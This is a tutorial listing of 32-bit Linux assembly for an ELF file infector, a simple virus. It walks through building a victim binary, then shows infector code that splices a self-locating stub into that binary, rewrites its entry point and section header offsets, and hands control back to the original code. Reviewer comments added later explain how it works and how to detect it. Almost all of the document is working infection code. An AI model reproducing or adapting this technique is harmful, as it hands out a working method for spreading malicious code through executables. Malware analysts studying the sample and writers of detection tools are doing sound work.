// Linux Infector
//
//
// Written by:
// dES
// Re(0ver
//
// e-mail: (destroyerb@hotmail.com)
//
// Reviewer note (analysis): this page is a tutorial listing, not one
// assemblable file -- victim.s and infector.s below both define _start and
// message.  Both targets are 32-bit Linux (int $0x80 system calls, AT&T
// syntax).  The fopen/fread/fwrite/fseek/fclose macros used by infector.s come
// from macroses.inc, which is not on this page; from their use here they appear
// to take the file descriptor in %ebx and leave the syscall result in %eax --
// confirm against macroses.inc before reasoning about register state across
// them.
//
// For analysts: the sample only works on a stripped, statically linked,
// non-PIE 32-bit ELF built exactly as in the steps below (it assumes a fixed
// load base rather than reading the program headers).  It modifies three
// header values in the copy it writes -- e_entry (file offset 0x18),
// e_shoff (0x20) and the sh_offset of the section header indexed by
// e_shstrndx -- and splices a code stub into the file at that section's old
// offset.  Comparing those fields against a known-good copy of the binary is
// enough to detect this kind of modification.
//
// How you can test it:
//
// 1. you need the victim:
// $ touch victim.s
// where must be -->

// victim.s: writes one message to stdout and exits (i386 Linux syscalls).
.global _start
_start:
        movl    $endstring, %edx        // edx = message length (write)
        movl    $message, %ecx          // ecx = message buffer
        xorl    %ebx, %ebx              // ebx = fd 0 (the author writes to fd 0, not stdout)
        movl    $0x4, %eax              // eax = 4 = write
        int     $0x80
        movl    $0x1, %eax              // eax = 1 = exit
        xorl    %ebx, %ebx              // ebx = exit status 0
        int     $0x80
message:        .string "Oh, no! Why me?!\n"
endstring=.-message                     // length of message, including the newline

// <---- victim.s
//
// 3. $ as victim.s
// 4. $ ld -o victim -s a.out
//
// 5. Okay, victim ready, now we have to prepare infector:
// $ touch infector.s
// where is -->

// infector.s: reads ./victim, writes a modified copy to /infectvictim.
// NOTE(review): everything, including the code, is placed in .data; there is
// no .text section in this listing.
.data
.include "macroses.inc"                 // fopen/fread/fwrite/fseek/fclose -- not on this page
victim:         .string "./victim"
result:         .string "/infectvictim" // absolute path; step 7 below runs ./victim instead
// NOTE(review): the next three labels alias one dword, as do symtpos/symindex.
newshoff:
entrysize:
newentry:       .long 0
tmphandle:      .long 0                 // fd of the output file
symtpos:                                // file position of the patched sh_offset field
symindex:       .long 0                 // e_shstrndx (read as a 16-bit word)
oldpoint:       .long 0                 // reused: e_shoff, then a section header position, then its sh_offset
message:        .string "Hel!\n"        // error message, 5 bytes
buffer:         .byte 0                 // one-byte copy buffer
.global _start
_start:
//------------------ Choose victim
        fopen   $victim, $0x2, $0       // O_RDWR; fd appears to be returned in %eax (macro not shown)
        pushl   %eax                    // keep the victim fd across the next fopen
//------------------ Create result-file
        fopen   $result, $01102, $00700 // O_RDWR | O_CREAT | O_TRUNC
        movl    %eax, tmphandle
//------------------ Getting an old entry point
        popl    %ebx                    // ebx = victim fd; the macros below seem to use it as the fd
        fseek   $0x18, $0x0             // 0x18 = e_entry; whence 0 written literally, SEEK_SET elsewhere
        fread   $address, $0x4          // stored directly into the stub's 'address' slot (see bodystart)
//------------------ Getting an old section header table offset
        fseek   $0x20, $SEEK_SET        // 0x20 = e_shoff
        fread   $oldpoint, $0x4
//------------------ Getting a section header table entry size
        fseek   $0x2e, $SEEK_SET        // 0x2e = e_shentsize (2 bytes); the 4-byte read also pulls in e_shnum
        fread   $entrysize, $0x4        //size+2
//------------------ Calculating new entry point
        fread   $symindex, $0x2         // file position is now 0x32 = e_shstrndx
        pushl   %ebx                    // ebx is needed as a multiplicand below
        xorl    %eax, %eax
        xorl    %ebx, %ebx
        movw    symindex, %bx           // bx = e_shstrndx
        movw    entrysize, %ax          // ax = e_shentsize (low word of the 4-byte read)
        mull    %ebx                    // eax = e_shentsize * e_shstrndx (clobbers edx)
        addl    oldpoint, %eax          // + e_shoff -> position of that section header
        movl    %eax, oldpoint
        addl    $0x10, oldpoint         // + 0x10 = Elf32_Shdr.sh_offset
        popl    %ebx                    // restore victim fd
        fseek   oldpoint, $SEEK_SET
        movl    oldpoint, %eax
        movl    %eax, symtpos           // remember where sh_offset lives in the file
        fread   $oldpoint, $0x4         // oldpoint = sh_offset of that section
//------------------- Forming 2nd part for writing
        fseek   $0x0, $SEEK_END         // result (file size) appears to come back in %eax
        subl    oldpoint, %eax          // eax = bytes after sh_offset
        pushl   %eax                    // saved for looper2
//------------------ Copying file
        xorl    %edx, %edx              // SEEK_SET
        xorl    %ecx, %ecx              // entry point in ELF
        movl    $0x13, %eax             // Seek in file (raw lseek; the only call whose result is checked)
        int     $0x80
        cmpl    $0xfffff001, %eax       // if error: eax in [-4095,-1] is -errno
        jae     error1
        movl    oldpoint, %ecx          // ecx = bytes to copy before the stub
looper:                                 // byte-at-a-time copy; ecx is preserved around the macros
        pushl   %ecx
        fread   $buffer, $0x1
        pushl   %ebx
        movl    tmphandle, %ebx         // switch fd to the output file for the write
        fwrite  $buffer, $0x1
        popl    %ebx
        popl    %ecx
        loop    looper
//------------------ Write body to the end
        pushl   %ebx
        movl    tmphandle, %ebx
        fwrite  $bodystart, $(bodyend-bodystart)
        popl    %ebx
//------------------ Append
        popl    %ecx                    // ecx = remaining byte count computed above
looper2:
        pushl   %ecx
        fread   $buffer, $0x1
        pushl   %ebx
        movl    tmphandle, %ebx
        fwrite  $buffer, $0x1
        popl    %ebx
        popl    %ecx
        loop    looper2
        fclose                          // It doesn't need (closes the victim fd still in %ebx)
//--------------------- Set New section header table offset
        movl    tmphandle, %ebx         // all remaining I/O is on the output file
        fseek   $0x20, $SEEK_SET        // e_shoff
        fread   $newshoff, $0x4
        addl    $(bodyend-bodystart), newshoff  // section headers moved down by the stub size
        fseek   $0x20, $SEEK_SET
        fwrite  $newshoff, $0x4
//-------------- New Entry Point
        fseek   $0x18, $SEEK_SET        // e_entry
        addl    $0x08048000, oldpoint   // 0x08048000 is the conventional i386 non-PIE base, assumed not read
        fwrite  $oldpoint, $0x4
//--------------- New SymIndex
        addl    $(bodyend-bodystart), symtpos   // the header itself moved by the stub size
        fseek   symtpos, $SEEK_SET
        addl    $(bodyend-bodystart), oldpoint
        subl    $0x08048000, oldpoint   // back to a file offset: old sh_offset + stub size
        fwrite  $oldpoint, $0x4
//--------------------- Close
close:
        fclose
        jmp     ne
error1:
        xorl    %ebx, %ebx              // stdout (fd 0 is actually stdin; author's comment kept)
        fwrite  $message, $0x5
ne:
        xorl    %ebx, %ebx              // stdout
        movl    $0x1, %eax              // exit(0) on both paths
        int     $0x80
// The stub copied into the output file (bodystart..bodyend).  It is
// position-independent: it locates itself with call/pop and addresses its
// data relative to %ebp.
bodystart:
        call    .+5                     // Get IP
        popl    %ebp
        subl    $0x5, %ebp              // ebp = address of bodystart at run time
        movl    $0xa, %edx              // 10 = length of "I'm here!\n"
        movl    $(shere-bodystart), %ecx
        addl    %ebp, %ecx              // ecx = run-time address of shere
        xorl    %ebx, %ebx
        movl    $0x4, %eax              // write
        int     $0x80
        mov     $(address-bodystart), %ebx
        add     %ebp, %ebx              // ebx = run-time address of 'address'
        mov     (%ebx), %eax            // eax = original e_entry read at offset 0x18 above
        call    *%eax                   // bye
address:        .long 0                 // filled by the fread of e_entry; no return expected
shere:          .string "I'm here!\n"
bodyend:

// <-- infector.s
// 7. run
// $ ./infector
// $ ./victim
// 8. And you will see it:
// I'm here!
// Oh, no! Why me?!
//
// That's all! We're waiting mails. Cua......